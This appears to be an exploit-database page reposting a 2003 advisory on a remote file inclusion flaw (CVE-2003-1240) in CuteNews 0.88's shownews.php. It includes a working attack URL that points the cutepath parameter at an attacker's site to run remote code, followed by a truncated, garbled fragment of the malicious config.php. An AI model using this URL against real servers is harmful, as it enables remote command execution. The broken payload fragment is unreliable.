Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2003-1240

Publish Date: 25 Feb 2003

Author: Over_G

                							

                source: http://www.securityfocus.com/bid/6935/info

CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.

Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/cutenews/shownews.php?cutepath=http://&lt;attacker_site&gt;/config.php

----------------------------------config.php----------------------------------------

/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CuteNews 0.88 - 'shownews.php' Remote File Inclusion

Vulmon Search

About

Products

Connect